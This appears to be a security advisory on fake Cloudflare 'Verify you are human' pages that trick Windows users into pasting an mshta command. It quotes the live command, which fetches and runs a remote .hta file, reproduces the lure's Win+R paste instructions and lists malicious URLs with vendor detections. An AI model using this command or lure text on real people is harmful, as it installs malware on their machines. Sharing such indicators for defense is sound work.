Fake CAPTCHA “Verify you are human” Cloudflare Turnstile —what to do?

If you come across a page that looks similar to Cloudflare and asks you to run code on your Windows machine, close the page and contact the webmaster. If your own website is affected by this malware, you need to take it off immediately—it will protect your visitors and it will prevent reputation damage.

How this malware works?

The fake Cloudflare page offers instructions on how to verify that you are a human but actually, you are being instructed to run malware on your computer via mshta a tool designed to run .hta files.

What to do if you are a victim?

If you fall for it, and run the code from the command prompt, it’s best to re-install the operating system.

Malicious code:

Unusual Web Traffic Detected
mshta http://bridge.tree-sock-rain.today/ # "Cloudflare Verification Code: 635H-U8N2-P9C1-1NZP"

1/61 security vendor flagged the .hta file as malicious
Kaspersky: HEUR:Trojan.Script.Generic

Antiy
Trojan[Ransom]/MP3.Spora.enc

Eset NOD32
JS/TrojanDownloader.Agent.ACCL trojan
JS/Obfuscated.BD/Heur.BZC.UGZ.Boxter.1.1FD073CE

Sitecheck (Sucuri)
Known javascript malware: malware?fake_update.8.27

Any.run
https://app.any.run/tasks/94e80210-079b-431c-9cc3-21a8515326b7

@SkylineETH

Malicious URLs:
https://dareka4te.shop/endpoint
https://bsc-dataseed.binance.org
http://bridge.tree-sock-rain.today
https://i.jolttapestry.fun/7456f63a46cc318334a70159aa3c4291
https://pptpooalfkakktl.com/clou?ts=1744107525

mshta https://securityverifservice[.]com, redirects to https://gdfjjkiririririqiiriri[.]com/oai

Taxt
Unusual Web Traffic Detected,
To proceed with verification, please follow these steps:
“I аm not a robot: Сlоudflarе Vеrificаtion ID: V22-ZAD”

1. hxxp://bridge[.]tree-sock-rain[.]today/
Hosting Provider behind Cloudflare:
CHANGWAY-AS, HK
[email protected]

2. hxxps://i[.]jolttapestry[.]fun
Hosting Provider behind Cloudflare:
VDSINA-AS, RU
[email protected]

3. hxxps://gdfjjkiririririqiiriri[.]com/oai
Hosting Provider behind Cloudflare:
H2NEXUS-AS, GB
[email protected]

Malicious page content, that instructs the victims to execute bad code.

Unusual Web Traffic Detected
Our security system has identified irregular web activity originating from your IP address. Automated verification attempts have failed, and we were unable to confirm that you are a legitimate user.
To proceed with verification, please follow these steps:
1. Press  Win + R to open Run.
2. Copy and paste Ctrl + V the following command:
3. Press Enter and wait for confirmation.
This manual verification step helps us ensure that your connection is secure and not part of an automated request. If you fail to complete this step, access to certain features may be temporarily restricted.